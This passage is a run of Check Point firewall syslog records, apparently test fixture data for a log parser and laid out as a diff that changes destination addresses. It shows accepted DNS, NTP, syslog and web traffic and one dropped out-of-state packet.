rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48353"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:22:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fb3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51565"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:22:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fb3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520563"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48353"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T22:22:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fb4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fbd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520573"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53031"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fbd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520573"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53031"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fbd,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36348"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fbd,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48565"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fbd,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; 
version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52888"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10672"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fbd,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52890"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10673"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fbd,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; 
log_delay:"1585520573"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32924"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T22:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fc7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520583"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39000"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T22:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fc7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520583"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57449"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:22:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; 
flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fbd,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520573"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32924"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fc7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520583"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39000"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:23:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fc7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520583"; 
layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57449"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T22:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fc9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32907"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] <134>1 2020-03-29T22:23:06Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e811fcb,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51754"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] <134>1 2020-03-29T22:23:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fcb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 
& FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52114"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T22:23:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fcb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52115"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T22:23:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fd1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520593"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51981"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T22:23:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fd1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520593"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56889"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T22:23:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fdb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520603"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57369"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:23:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fd1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520593"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51981"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:23:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fd1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520593"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56889"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T22:23:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fdb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520603"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57369"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T22:23:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fdc,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T22:23:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fde,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T22:23:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fe1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52116"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T22:23:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fe1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52117"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T22:23:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fe1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52118"; service:"443"; service_id:"https"; 
